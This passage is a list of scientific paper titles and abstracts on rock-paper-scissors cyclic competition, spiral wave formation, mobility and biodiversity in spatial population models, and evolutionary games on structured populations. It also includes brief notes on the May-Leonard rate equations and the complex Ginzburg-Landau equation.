relevant for the formation and propagation of patterns in excitable media, such as chemical kinetics or epidemic outbreaks. --- paper_title: Discriminating the effects of spatial extent and population size in cyclic competition among species paper_content: We introduce a population model for species under cyclic competition. This model allows individuals to coexist and interact on single cells while migration takes place between adjacent cells. In contrast to the model introduced by Reichenbach, Mobilia, and Frey [Reichenbach, Mobilia, and Frey, Nature (London) 448, 1046 (2007)], we find that the emergence of spirals results in an ambiguous behavior regarding the stability of coexistence. The typical time until extinction exhibits, however, a qualitatively opposite dependence on the newly introduced nonunit carrying capacity in the spiraling and the nonspiraling regimes. This allows us to determine a critical mobility that marks the onset of this spiraling state sharply. In contrast, we demonstrate that the conventional finite size stability analysis with respect to spatial size is of limited use for identifying the onset of the spiraling regime. 
--- paper_title: Basins of attraction for species extinction and coexistence in spatial rock-paper-scissors games paper_content: We study the collective dynamics of mobile species under cyclic competition by breaking the symmetry in the initial populations and examining the basins of the two distinct asymptotic states: extinction and coexistence, the latter maintaining biodiversity. We find a rich dependence of dynamical properties on initial conditions. In particular, for high mobility, only extinction basins exist and they are spirally entangled, but a basin of coexistence emerges when the mobility parameter is decreased through a critical value, whose area increases monotonically as the parameter is further decreased. The structure of extinction basins for high mobility can be predicted by a mean-field theory. These results provide a more comprehensive picture for the fundamental issue of species coexistence than previously achieved. --- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: Three- and four-state rock-paper-scissors games with diffusion paper_content: Cyclic dominance of three species is a commonly occurring interaction dynamics, often denoted the rock-paper-scissors (RPS) game. Such a type of interactions is known to promote species coexistence. Here, we generalize recent results of Reichenbach [Nature (London) 448, 1046 (2007)] of a four-state variant of the RPS game. We show that spiral formation takes place only without a conservation law for the total density. Nevertheless, in general, fast diffusion can destroy species coexistence. We also generalize the four-state model to slightly varying reaction rates. This is shown both analytically and numerically not to change pattern formation, or the effective wavelength of the spirals, and therefore not to alter the qualitative properties of the crossover to extinction. --- paper_title: Vertex dynamics during domain growth in three-state models paper_content: Topological aspects of interfaces are studied by comparing quantitatively the evolving three-color patterns in three different models, such as the three-state voter, Potts, and extended voter models. The statistical analysis of some geometrical features allows us to explore the role of different elementary processes during distinct coarsening phenomena in the above models. --- paper_title: When does cyclic dominance lead to stable spiral waves? 
paper_content: Species diversity in ecosystems is often accompanied by the self-organisation of the population into fascinating spatio-temporal patterns. Here, we consider a two-dimensional three-species population model and study the spiralling patterns arising from the combined effects of generic cyclic dominance, mutation, pair-exchange and hopping of the individuals. The dynamics is characterised by nonlinear mobility and a Hopf bifurcation around which the system's phase diagram is inferred from the underlying complex Ginzburg-Landau equation derived using a perturbative multiscale expansion. While the dynamics is generally characterised by spiralling patterns, we show that spiral waves are stable in only one of the four phases. Furthermore, we characterise a phase where nonlinearity leads to the annihilation of spirals and to the spatially uniform dominance of each species in turn. Away from the Hopf bifurcation, when the coexistence fixed point is unstable, the spiralling patterns are also affected by nonlinear diffusion. --- paper_title: Instability of spatial patterns and its ambiguous impact on species diversity paper_content: Self-arrangement of individuals into spatial patterns often accompanies and promotes species diversity in ecological systems. Here, we investigate pattern formation arising from cyclic dominance of three species, operating near a bifurcation point. In its vicinity, an Eckhaus instability occurs, leading to convectively unstable "blurred" patterns. At the bifurcation point, stochastic effects dominate and induce counterintuitive effects on diversity: Large patterns, emerging for medium values of individuals' mobility, lead to rapid species extinction, while small patterns (low mobility) promote diversity, and high mobilities render spatial structures irrelevant. We provide a quantitative analysis of these phenomena, employing a complex Ginzburg-Landau equation. --- paper_title: Spatial social dilemmas: dilution, mobility and grouping effects with imitation dynamics paper_content: We present an extensive, systematic study of the Prisoner's Dilemma and Snowdrift games on a square lattice under a synchronous, noiseless imitation dynamics. We show that for both the occupancy of the network and the (random) mobility of the agents there are intermediate values that may increase the amount of cooperators in the system and new phases appear. We analytically determine the transition lines between these phases and compare with the mean field prediction and the observed behavior on a square lattice. We point out which are the more relevant microscopic processes that entitle cooperators to invade a population of defectors in the presence of mobility and discuss the universality of these results. --- paper_title: Evolutionary games on graphs paper_content: Game theory is one of the key paradigms behind many scientific disciplines from biology to behavioral sciences to economics. In its evolutionary form and especially when the interacting agents are linked in a specific social network the underlying solution concepts and methods are very similar to those applied in non-equilibrium statistical physics. This review gives a tutorial-type overview of the field for physicists. The first three sections introduce the necessary background in classical and evolutionary game theory from the basic definitions to the most important results. The fourth section surveys the topological complications implied by non-mean-field-type social network structures in general. 
The last three sections discuss in detail the dynamic behavior of three prominent classes of models: the Prisoner's Dilemma, the Rock-Scissors-Paper game, and Competing Associations. The major theme of the review is in what sense and how the graph structure of interactions can modify and enrich the picture of long term behavioral patterns emerging in evolutionary games. --- paper_title: Random mobility and spatial structure often enhance cooperation paper_content: The effects of an unconditional move rule in the spatial Prisoner's Dilemma, Snowdrift and Stag Hunt games are studied. Spatial structure by itself is known to modify the outcome of many games when compared with a randomly mixed population, sometimes promoting, sometimes inhibiting cooperation. Here we show that random dilution and mobility may suppress the inhibiting factors of the spatial structure in the Snowdrift game, while enhancing the already larger cooperation found in the Prisoner's dilemma and Stag Hunt games. --- paper_title: Coevolutionary dynamics in structured populations of three species paper_content: Inspired by the experiments with the three strains of E. coli bacteria as well as the three morphs of Uta stansburiana lizards, a model of cyclic dominance was proposed to investigate the mechanisms facilitating the maintenance of biodiversity in spatially structured populations. Subsequent studies enriched the original model with various biologically motivated extensions, repeating the proposed mathematical analysis and computer simulations. The research presented in this thesis unifies and generalises these models by combining the birth, selection-removal, selection-replacement and mutation processes as well as two forms of mobility into a generic metapopulation model. Instead of the standard mathematical treatment, more controlled analysis with inverse system size and multiscale asymptotic expansions is presented to derive an approximation of the system dynamics in terms of a well-known pattern forming equation. The novel analysis, capable of increased accuracy, is evaluated with improved numerical experiments performed with bespoke software developed for simulating the stochastic and deterministic descriptions of the generic metapopulation model. The emergence of spiral waves facilitating the long term biodiversity is confirmed in the computer simulations as predicted by the theory. The derived conditions on the stability of spiral patterns for different values of the biological parameters are studied, resulting in discoveries of interesting phenomena such as spiral annihilation or instabilities caused by nonlinear diffusive terms. --- paper_title: Velocity-enhanced Cooperation of Moving Agents playing Public Goods Games paper_content: In this Brief Report we study the evolutionary dynamics of the Public Goods Game in a population of mobile agents embedded in a 2-dimensional space. In this framework, the backbone of interactions between agents changes in time, allowing us to study the impact that mobility has on the emergence of cooperation in structured populations. We compare our results with a static case in which agents interact on top of a Random Geometric Graph. Our results point out that a low degree of mobility enhances the onset of cooperation in the system while a moderate velocity favors the fixation of the full-cooperative state.
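To make the selection and reproduction processes referred to in the preceding entries concrete, the corresponding mean-field rate equations are often written in May-Leonard form. The sketch below uses a common convention with selection rate \sigma and reproduction rate \mu; the notation is chosen here for illustration and need not coincide with that of the cited works.

\partial_t a = a\,[\mu\,(1-\rho) - \sigma\, c],
\partial_t b = b\,[\mu\,(1-\rho) - \sigma\, a],
\partial_t c = c\,[\mu\,(1-\rho) - \sigma\, b], \qquad \rho = a + b + c,

where a, b and c are the species densities, reproduction fills the empty fraction 1-\rho at rate \mu, and selection removes the dominated species at rate \sigma along the cycle a beats b, b beats c, c beats a. In the well-mixed limit the interior coexistence fixed point of such equations is typically unstable, which is one reason why the spatial structure and mobility emphasized throughout this list play such a decisive role.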
--- paper_title: Spiral Waves Emergence in a Cyclic Predator-Prey Model paper_content: Based on a cyclic predator-prey model of three species, spiral waves at the global level of the system are obtained. It is found that the predation intensity greatly affects the behavior of spiral waves. The wavelength of spiral waves alters with the mobility in the form λ ∼ D^θ. Values of θ are determined by the predation rates between species. This indicates that the behavior of spiral waves as mobility varies is universal at a given predation rate, which reflects the competition for resources among species. --- paper_title: Effect of epidemic spreading on species coexistence in spatial rock-paper-scissors games paper_content: A fundamental question in nonlinear science and evolutionary biology is how epidemic spreading may affect coexistence. We address this question in the framework of mobile species under cyclic competitions by investigating the roles of both intra- and interspecies spreading. A surprising finding is that intraspecies infection can strongly promote coexistence while interspecies spreading cannot. These results are quantified and a theoretical paradigm based on nonlinear partial differential equations is derived to explain the numerical results. --- paper_title: Pattern formation, synchronization, and outbreak of biodiversity in cyclically competing games paper_content: Species in nature are typically mobile over diverse distance scales, examples of which range from bacteria run to long-distance animal migrations. These behaviors can have a significant impact on biodiversity. Addressing the role of migration in biodiversity microscopically is fundamental but remains a challenging problem in interdisciplinary science. We incorporate both intra- and inter-patch migrations in stochastic games of cyclic competitions and find that the interplay between the migrations at the local and global scales can lead to robust species coexistence characterized dynamically by the occurrence of remarkable target-wave patterns in the absence of any external control. The waves can emerge from either mixed populations or isolated species in different patches, regardless of the size and the location of the migration target. We also find that, even in a single-species system, target waves can arise from rare mutations, leading to an outbreak of biodiversity. A surprising phenomenon is that target waves in different patches can exhibit synchronization and time-delayed synchronization, where the latter potentially enables the prediction of future evolutionary dynamics. We provide a physical theory based on the spatiotemporal organization of the target waves to explain the synchronization phenomena. We also investigate the basins of coexistence and extinction to establish the robustness of biodiversity through migrations. Our results are relevant to issues of general and broader interest such as pattern formation, control in excitable systems, and the origin of order arising from self-organization in social and natural systems. --- paper_title: Cyclic competition of mobile species on continuous space: pattern formation and coexistence. paper_content: We propose a model for cyclically competing species on continuous space and investigate the effect of the interplay between the interaction range and mobility on coexistence. A transition from coexistence to extinction is uncovered with a strikingly nonmonotonic behavior in the coexistence probability.
Around the minimum in the probability, switches between spiral and plane-wave patterns arise. A strong mobility can either promote or hamper coexistence, depending on the radius of the interaction range. These phenomena are absent in any lattice-based model, and we demonstrate that they can be explained using nonlinear partial differential equations. Our continuous-space model is more physical and we expect the findings to generate experimental interest. --- paper_title: Effects of competition on pattern formation in the rock-paper-scissors game paper_content: We investigate the impact of cyclic competition on pattern formation in the rock-paper-scissors game. By separately considering random and prepared initial conditions, we observe a critical influence of the competition rate p on the stability of spiral waves and on the emergence of biodiversity. In particular, while increasing values of p promote biodiversity, they may act detrimentally on spatial pattern formation. For random initial conditions, we observe a phase transition from biodiversity to an absorbing phase, whereby the critical value of mobility grows linearly with increasing values of p on a log-log scale but then saturates as p becomes large. For prepared initial conditions, we observe the formation of single-armed spirals, but only for values of p that are below a critical value. Once above that value, the spirals break up and form disordered spatial structures, mainly because of the percolation of vacant sites. Thus there exists a critical value of the competition rate p_c for stable single-armed spirals in finite populations. Importantly though, p_c increases with increasing system size because noise reinforces the disintegration of ordered patterns. In addition, we also find that p_c increases with the mobility. These phenomena are reproduced by a deterministic model that is based on nonlinear partial differential equations. Our findings indicate that competition is vital for the sustenance of biodiversity and the emergence of pattern formation in ecosystems governed by cyclical interactions. --- paper_title: Self-Organization of Mobile Populations in Cyclic Competition paper_content: The formation of out-of-equilibrium patterns is a characteristic feature of spatially extended, biodiverse, ecological systems. Intriguing examples are provided by cyclic competition of species, as metaphorically described by the 'rock-paper-scissors' game. Both experimentally and theoretically, such non-transitive interactions have been found to induce self-organization of static individuals into noisy, irregular clusters. However, a profound understanding and characterization of such patterns is still lacking. Here, we theoretically investigate the influence of individuals' mobility on the spatial structures emerging in rock-paper-scissors games. We devise a quantitative approach to analyze the spatial patterns self-forming in the course of the stochastic time evolution. For a paradigmatic model originally introduced by May and Leonard, within an interacting particle approach, we demonstrate that the system's behavior, in the proper continuum limit, is aptly captured by a set of stochastic partial differential equations. The system's stochastic dynamics is shown to lead to the emergence of entangled rotating spiral waves.
While the spirals' wavelength and spreading velocity is demonstrated to be accurately predicted by a (deterministic) complex Ginzburg-Landau equation, their entanglement results from the inherent stochastic nature of the system. These findings and our methods have important applications for understanding the formation of noisy patterns, e.g. in ecological and evolutionary contexts, and are also of relevance for the kinetics of (bio)-chemical reactions. --- paper_title: Basins of coexistence and extinction in spatially extended ecosystems of cyclically competing species paper_content: Microscopic models based on evolutionary games on spatially extended scales have recently been developed to address the fundamental issue of species coexistence. In this pursuit almost all existing works focus on the relevant dynamical behaviors originated from a single but physically reasonable initial condition. To gain comprehensive and global insights into the dynamics of coexistence, here we explore the basins of coexistence and extinction and investigate how they evolve as a basic parameter of the system is varied. Our model is cyclic competitions among three species as described by the classical rock-paper-scissors game, and we consider both discrete lattice and continuous space, incorporating species mobility and intraspecific competitions. Our results reveal that, for all cases considered, a basin of coexistence always emerges and persists in a substantial part of the parameter space, indicating that coexistence is a robust phenomenon. Factors such as intraspecific competition can, in fact, promote coexistence by facilitating the emergence of the coexistence basin. In addition, we find that the extinction basins can exhibit quite complex structures in terms of the convergence time toward the final state for different initial conditions. We have also developed models based on partial differential equations, which yield basin structures that are in good agreement with those from microscopic stochastic simulations. To understand the origin and emergence of the observed complicated basin structures is challenging at the present due to the extremely high dimensional nature of the underlying dynamical system. --- paper_title: Does mobility decrease cooperation? paper_content: We explore the minimal conditions for sustainable cooperation on a spatially distributed population of memoryless, unconditional strategies (cooperators and defectors) in presence of unbiased, non-contingent mobility in the context of the Prisoner's Dilemma game. We find that cooperative behavior is not only possible but may even be enhanced by such an "always-move" rule, when compared with the strongly viscous ("never-move") case. In addition, mobility also increases the capability of cooperation to emerge and invade a population of defectors, what may have a fundamental role in the problem of the onset of cooperation. --- paper_title: Effects of mobility in a population of Prisoner's Dilemma players paper_content: We address the problem of how the survival of cooperation in a social system depends on the motion of the individuals. Specifically, we study a model in which prisoner's dilemma players are allowed to move in a two-dimensional plane. Our results show that cooperation can survive in such a system provided that both the temptation to defect and the velocity at which agents move are not too high. 
Moreover, we show that when these conditions are fulfilled, the only asymptotic state of the system is that in which all players are cooperators. Our results might have implications for the design of cooperative strategies in motion coordination and other applications including wireless networks. --- paper_title: Noise and Correlations in a Spatial Population Model with Cyclic Competition paper_content: Noise and spatial degrees of freedom characterize most ecosystems. Some aspects of their influence on the coevolution of populations with cyclic interspecies competition have been demonstrated in recent experiments [e.g., B. Kerr et al., Nature (London) 418, 171 (2002)]. To reach a better theoretical understanding of these phenomena, we consider a paradigmatic spatial model where three species exhibit cyclic dominance. Using an individual-based description, as well as stochastic partial differential and deterministic reaction-diffusion equations, we account for stochastic fluctuations and spatial diffusion at different levels and show how fascinating patterns of entangled spirals emerge. We rationalize our analysis by computing the spatiotemporal correlation functions and provide analytical expressions for the front velocity and the wavelength of the propagating spiral waves. --- paper_title: Vortex dynamics in a three-state model under cyclic dominance. paper_content: The evolution of domain structure is investigated in a two-dimensional voter model with three states under cyclic dominance. The study focuses on the dynamics of vortices, defined by the points where the three states (domains) meet. We can distinguish vortices and antivortices which walk randomly and annihilate each other. The domain wall motion can create vortex-antivortex pairs at a rate that is increased by the spiral formation due to cyclic dominance. This mechanism is contrasted with a branching annihilating random walk (BARW) in a particle-antiparticle system with density-dependent pair creation rate. Numerical estimates for the critical indices of the vortex density [β = 0.29(4)] and of its fluctuation [γ = 0.34(6)] improve an earlier Monte Carlo study [K. Tainaka and Y. Itoh, Europhys. Lett. 15, 399 (1991)] of the three-state cyclic model in two dimensions. --- paper_title: Emergence of target waves in paced populations of cyclically competing species paper_content: We investigate the emergence of target waves in a cyclic predator-prey model incorporating a periodic current of the three competing species in a small area situated at the center of the square lattice. The periodic current acts as a pacemaker, trying to impose its rhythm on the overall spatiotemporal evolution of the three species. We show that the pacemaker is able to nucleate target waves that eventually spread across the whole population, whereby three routes leading to this phenomenon can be distinguished depending on the mobility of the three species and the oscillation period of the localized current. First, target waves can emerge due to the synchronization between the periodic current and oscillations of the density of the three species on the spatial grid. The second route is similar to the first, the difference being that the synchronization sets in only intermittently. Finally, the third route towards target waves is realized when the frequency of the pacemaker is much higher than that characterizing the oscillations of the overall density of the three species.
By considering mobility and the frequency of the current as variable parameters, we thus provide insights into the mechanisms of pattern formation resulting from the interplay between local and global dynamics in systems governed by cyclically competing species. --- paper_title: Discriminating the effects of spatial extent and population size in cyclic competition among species paper_content: We introduce a population model for species under cyclic competition. This model allows individuals to coexist and interact on single cells while migration takes place between adjacent cells. In contrast to the model introduced by Reichenbach, Mobilia, and Frey [Reichenbach, Mobilia, and Frey, Nature (London) 448, 1046 (2007)], we find that the emergence of spirals results in an ambiguous behavior regarding the stability of coexistence. The typical time until extinction exhibits, however, a qualitatively opposite dependence on the newly introduced nonunit carrying capacity in the spiraling and the nonspiraling regimes. This allows us to determine a critical mobility that marks the onset of this spiraling state sharply. In contrast, we demonstrate that the conventional finite size stability analysis with respect to spatial size is of limited use for identifying the onset of the spiraling regime. --- paper_title: Local dispersal promotes biodiversity in a real-life game of rock–paper–scissors paper_content: One of the central aims of ecology is to identify mechanisms that maintain biodiversity. Numerous theoretical models have shown that competing species can coexist if ecological processes such as dispersal, movement, and interaction occur over small spatial scales. In particular, this may be the case for non-transitive communities, that is, those without strict competitive hierarchies. The classic non-transitive system involves a community of three competing species satisfying a relationship similar to the children's game rock-paper-scissors, where rock crushes scissors, scissors cuts paper, and paper covers rock. Such relationships have been demonstrated in several natural systems. Some models predict that local interaction and dispersal are sufficient to ensure coexistence of all three species in such a community, whereas diversity is lost when ecological processes occur over larger scales. Here, we test these predictions empirically using a non-transitive model community containing three populations of Escherichia coli. We find that diversity is rapidly lost in our experimental community when dispersal and interaction occur over relatively large spatial scales, whereas all populations coexist when ecological processes are localized. --- paper_title: When does cyclic dominance lead to stable spiral waves? paper_content: Species diversity in ecosystems is often accompanied by the self-organisation of the population into fascinating spatio-temporal patterns. Here, we consider a two-dimensional three-species population model and study the spiralling patterns arising from the combined effects of generic cyclic dominance, mutation, pair-exchange and hopping of the individuals. The dynamics is characterised by nonlinear mobility and a Hopf bifurcation around which the system's phase diagram is inferred from the underlying complex Ginzburg-Landau equation derived using a perturbative multiscale expansion. While the dynamics is generally characterised by spiralling patterns, we show that spiral waves are stable in only one of the four phases. 
Furthermore, we characterise a phase where nonlinearity leads to the annihilation of spirals and to the spatially uniform dominance of each species in turn. Away from the Hopf bifurcation, when the coexistence fixed point is unstable, the spiralling patterns are also affected by nonlinear diffusion. --- paper_title: Co-existence in the two-dimensional May-Leonard model with random rates paper_content: We employ Monte Carlo simulations to numerically study the temporal evolution and transient oscillations of the population densities, the associated frequency power spectra, and the spatial correlation functions in the (quasi-) steady state in two-dimensional stochastic May-Leonard models of mobile individuals, allowing for particle exchanges with nearest-neighbors and hopping onto empty sites. We therefore consider a class of four-state three-species cyclic predator-prey models whose total particle number is not conserved. We demonstrate that quenched disorder in either the reaction or in the mobility rates hardly impacts the dynamical evolution, the emergence and structure of spiral patterns, or the mean extinction time in this system. We also show that direct particle pair exchange processes promote the formation of regular spiral structures. Moreover, upon increasing the rates of mobility, we observe a remarkable change in the extinction properties in the May-Leonard system (for small system sizes): (1) as the mobility rate exceeds a threshold that separates a species coexistence (quasi-) steady state from an absorbing state, the mean extinction time as a function of system size N crosses over from a functional form ∼ e^{cN}/N (where c is a constant) to a linear dependence; (2) the measured histogram of extinction times displays a corresponding crossover from an (approximately) exponential to a Gaussian distribution. The latter results are found to hold true also when the mobility rates are randomly distributed. --- paper_title: Spatial Rock-Paper-Scissors Models with Inhomogeneous Reaction Rates paper_content: We study several variants of the stochastic four-state rock-paper-scissors game or, equivalently, cyclic three-species predator-prey models with conserved total particle density, by means of Monte Carlo simulations on one- and two-dimensional lattices. Specifically, we investigate the influence of spatial variability of the reaction rates and site occupancy restrictions on the transient oscillations of the species densities and on spatial correlation functions in the quasistationary coexistence state. For small systems, we also numerically determine the dependence of typical extinction times on the number of lattice sites. In stark contrast with two-species stochastic Lotka-Volterra systems, we find that for our three-species models with cyclic competition quenched disorder in the reaction rates has very little effect on the dynamics and the long-time properties of the coexistence state. Similarly, we observe that site restriction only has a minor influence on the system's dynamical properties. Our results therefore demonstrate that the features of the spatial rock-paper-scissors system are remarkably robust with respect to model variations, and stochastic fluctuations as well as spatial correlations play a comparatively minor role.
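For reference, the complex Ginzburg-Landau equation that several of these entries derive through multiscale expansions can be written, in rescaled units, in the standard form below; the real coefficients b and c (notation assumed here) are model dependent and are precisely what the cited perturbative treatments compute for a given microscopic model.

\partial_t A = A + (1 + i b)\,\nabla^2 A - (1 + i c)\,|A|^2 A,

where A(x, t) is the complex modulation amplitude of the pattern; the values of b and c determine, for example, whether plane waves and spiral solutions are stable or suffer instabilities such as the Eckhaus instability mentioned elsewhere in this list.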
--- paper_title: Handbook of Stochastic Methods: For Physics, Chemistry and the Natural Sciences paper_content: The Handbook of Stochastic Methods covers systematically and in simple language the foundations of Markov systems, stochastic differential equations, Fokker-Planck equations, approximation methods, chemical master equations, and quantum-mechanical Markov processes. Strong emphasis is placed on systematic approximation methods for solving problems. Stochastic adiabatic elimination is newly formulated. The book contains the "folklore" of stochastic methods in systematic form and is suitable for use as a reference work. --- paper_title: Coevolutionary dynamics in structured populations of three species paper_content: Inspired by the experiments with the three strains of E. coli bacteria as well as the three morphs of Uta stansburiana lizards, a model of cyclic dominance was proposed to investigate the mechanisms facilitating the maintenance of biodiversity in spatially structured populations. Subsequent studies enriched the original model with various biologically motivated extensions, repeating the proposed mathematical analysis and computer simulations. The research presented in this thesis unifies and generalises these models by combining the birth, selection-removal, selection-replacement and mutation processes as well as two forms of mobility into a generic metapopulation model. Instead of the standard mathematical treatment, more controlled analysis with inverse system size and multiscale asymptotic expansions is presented to derive an approximation of the system dynamics in terms of a well-known pattern forming equation. The novel analysis, capable of increased accuracy, is evaluated with improved numerical experiments performed with bespoke software developed for simulating the stochastic and deterministic descriptions of the generic metapopulation model. The emergence of spiral waves facilitating the long term biodiversity is confirmed in the computer simulations as predicted by the theory. The derived conditions on the stability of spiral patterns for different values of the biological parameters are studied, resulting in discoveries of interesting phenomena such as spiral annihilation or instabilities caused by nonlinear diffusive terms. --- paper_title: Global attractors and extinction dynamics of cyclically competing species paper_content: Transitions to absorbing states are of fundamental importance in nonequilibrium physics as well as ecology. In ecology, absorbing states correspond to the extinction of species. We here study the spatial population dynamics of three cyclically interacting species. The interaction scheme comprises both direct competition between species as in the cyclic Lotka-Volterra model, and separated selection and reproduction processes as in the May-Leonard model. We show that the dynamic processes leading to the transient maintenance of biodiversity are closely linked to attractors of the nonlinear dynamics for the overall species' concentrations. The characteristics of these global attractors change qualitatively at certain threshold values of the mobility and depend on the relative strength of the different types of competition between species. They give information about the scaling of extinction times with the system size and thereby the stability of biodiversity. We define an effective free energy as the negative logarithm of the probability to find the system in a specific global state before reaching one of the absorbing states.
The global attractors then correspond to minima of this effective energy landscape and determine the most probable values for the species' global concentrations. As in equilibrium thermodynamics, qualitative changes in the effective free energy landscape indicate and characterize the underlying nonequilibrium phase transitions. We provide the complete phase diagrams for the population dynamics and give a comprehensive analysis of the spatio-temporal dynamics and routes to extinction in the respective phases. --- paper_title: Local migration promotes competitive restraint in a host–pathogen 'tragedy of the commons' paper_content: These T4 phage and their E. coli hosts are the model for a typical 'victim-exploiter' interaction in a study of the role of migration patterns in a 'tragedy of the commons' competition for limited resources within fragmented communities. In this host-pathogen system, growing in 96-well microtitre plates, coexistence, stability and evolution within the separated communities depend critically on migration: restricted migration can promote restraint in the use of the common resource. In this experiment and in theory, highly connected social networks favour virulence. Fragmented populations possess an intriguing duplicity: even if subpopulations are reliably extinction-prone, asynchrony in local extinctions and recolonizations makes global persistence possible. Migration is a double-edged sword in such cases: too little migration prevents recolonization of extinct patches, whereas too much synchronizes subpopulations, raising the likelihood of global extinction. Both edges of this proverbial sword have been explored by manipulating the rate of migration within experimental populations. However, few experiments have examined how the evolutionary ecology of fragmented populations depends on the pattern of migration. Here, we show that the migration pattern affects both coexistence and evolution within a community of bacterial hosts (Escherichia coli) and viral pathogens (T4 coliphage) distributed across a large network of subpopulations. In particular, different patterns of migration select for distinct pathogen strategies, which we term 'rapacious' and 'prudent'. These strategies define a 'tragedy of the commons': rapacious phage displace prudent variants for shared host resources, but prudent phage are more productive when alone. We find that prudent phage dominate when migration is spatially restricted, while rapacious phage evolve under unrestricted migration. Thus, migration pattern alone can determine whether a de novo tragedy of the commons is resolved in favour of restraint. --- paper_title: Evolution of restraint in a structured rock-paper-scissors community. paper_content: It is not immediately clear how costly behavior that benefits others evolves by natural selection. By saving on inherent costs, individuals that do not contribute socially have a selective advantage over altruists if both types receive equal benefits. Restrained consumption of a common resource is a form of altruism. The cost of this kind of prudent behavior is that restrained individuals give up resources to less-restrained individuals. The benefit of restraint is that better resource management may prolong the persistence of the group. One way to dodge the problem of defection is for altruists to interact disproportionately with other altruists.
With limited dispersal, restrained individuals persist because of interaction with like types, whereas it is the unrestrained individuals that must face the negative long-term consequences of their rapacity. Here, we study the evolution of restraint in a community of three competitors exhibiting a nontransitive (rock–paper–scissors) relationship. The nontransitivity ensures a form of negative feedback, whereby improvement in growth of one competitor has the counterintuitive consequence of lowering the density of that improved player. This negative feedback generates detrimental long-term consequences for unrestrained growth. Using both computer simulations and evolution experiments with a nontransitive community of Escherichia coli, we find that restrained growth can evolve under conditions of limited dispersal in which negative feedback is present. This research, thus, highlights a set of ecological conditions sufficient for the evolution of one form of altruism. --- paper_title: Characterization of spiraling patterns in spatial rock-paper-scissors games paper_content: The spatiotemporal arrangement of interacting populations often influences the maintenance of species diversity and is a subject of intense research. Here, we study the spatiotemporal patterns arising from the cyclic competition between three species in two dimensions. Inspired by recent experiments, we consider a generic metapopulation model comprising “rock-paper-scissors” interactions via dominance removal and replacement, reproduction, mutations, pair exchange, and hopping of individuals. By combining analytical and numerical methods, we obtain the model's phase diagram near its Hopf bifurcation and quantitatively characterize the properties of the spiraling patterns arising in each phase. The phases characterizing the cyclic competition away from the Hopf bifurcation (at low mutation rate) are also investigated. Our analytical approach relies on the careful analysis of the properties of the complex Ginzburg-Landau equation derived through a controlled (perturbative) multiscale expansion around the model's Hopf bifurcation. Our results allow us to clarify when spatial “rock-paper-scissors” competition leads to stable spiral waves and under which circumstances they are influenced by nonlinear mobility. --- paper_title: Spirals and coarsening patterns in the competition of many species: A complex Ginzburg-Landau approach paper_content: In order to model real ecological systems one has to consider many species that interact in complex ways. However, most of the recent theoretical studies have been restricted to few species systems with rather trivial interactions. The few studies dealing with larger number of species and/or more complex interaction schemes are mostly restricted to numerical explorations. In this paper we determine, starting from the deterministic mean-field rate equations, for large classes of systems the space of coexistence fixed points at which biodiversity is maximal. For systems with a single coexistence fixed point we derive complex Ginzburg–Landau equations that allow to describe space-time pattern realized in two space dimensions. For selected cases we compare the theoretical predictions with the pattern observed in numerical simulations. --- paper_title: Mobility promotes and jeopardizes biodiversity in rock-paper-scissors games paper_content: Biodiversity is essential to the viability of ecological systems. 
Species diversity in ecosystems is promoted by cyclic, non-hierarchical interactions among competing populations. Such non-transitive relations lead to an evolution with central features represented by the 'rock-paper-scissors' game, where rock crushes scissors, scissors cut paper, and paper wraps rock. In combination with spatial dispersal of static populations, this type of competition results in the stable coexistence of all species and the long-term maintenance of biodiversity. However, population mobility is a central feature of real ecosystems: animals migrate, bacteria run and tumble. Here, we observe a critical influence of mobility on species diversity. When mobility exceeds a certain value, biodiversity is jeopardized and lost. In contrast, below this critical threshold all subpopulations coexist and an entanglement of travelling spiral waves forms in the course of temporal evolution. We establish that this phenomenon is robust; it does not depend on the details of cyclic competition or spatial environment. These findings have important implications for maintenance and evolution of ecological systems and are relevant for the formation and propagation of patterns in excitable media, such as chemical kinetics or epidemic outbreaks. --- paper_title: Phase diagrams for three-strategy evolutionary prisoner's dilemma games on regular graphs paper_content: Evolutionary prisoner's dilemma games are studied with players located on square lattice and random regular graph defining four neighbors for each one. The players follow one of the three strategies: tit-for-tat, unconditional cooperation, and defection. The simplified payoff matrix is characterized by two parameters: the temptation b to choose defection and the cost c of inspection reducing the income of tit-for-tat. The strategy imitation from one of the neighbors is controlled by pairwise comparison at a fixed level of noise. Using Monte Carlo simulations and the extended versions of pair approximation we have evaluated the b-c phase diagrams indicating a rich plethora of phase transitions between stationary coexistence, absorbing, and oscillatory states, including continuous and discontinuous phase transitions. For reasonable costs the tit-for-tat strategy prevents extinction of cooperators across the whole span of b determining the prisoner's dilemma game, irrespective of the connectivity structure. We also demonstrate that the system can exhibit a repetitive succession of oscillatory and stationary states upon changing a single payoff value, which highlights the remarkable sensitivity of cyclical interactions to the parameters that define the strength of dominance. --- paper_title: Fronts, pulses, sources and sinks in generalized complex Ginzburg-Landau equations paper_content: An important element in the long-time dynamics of pattern forming systems is a class of solutions we will call "coherent structures". These are states that are either themselves localized, or that consist of domains of regular patterns connected by localized defects or interfaces. This paper summarizes and extends recent work on such coherent structures in the one-dimensional complex Ginzburg-Landau equation and its generalizations, for which rather complete information can be obtained on the existence and competition of fronts, pulses, sources and sinks. For the special subclass of uniformly translating structures, the solutions are derived from a set of ordinary differential equations that can be interpreted as a flow in a three-dimensional phase space.
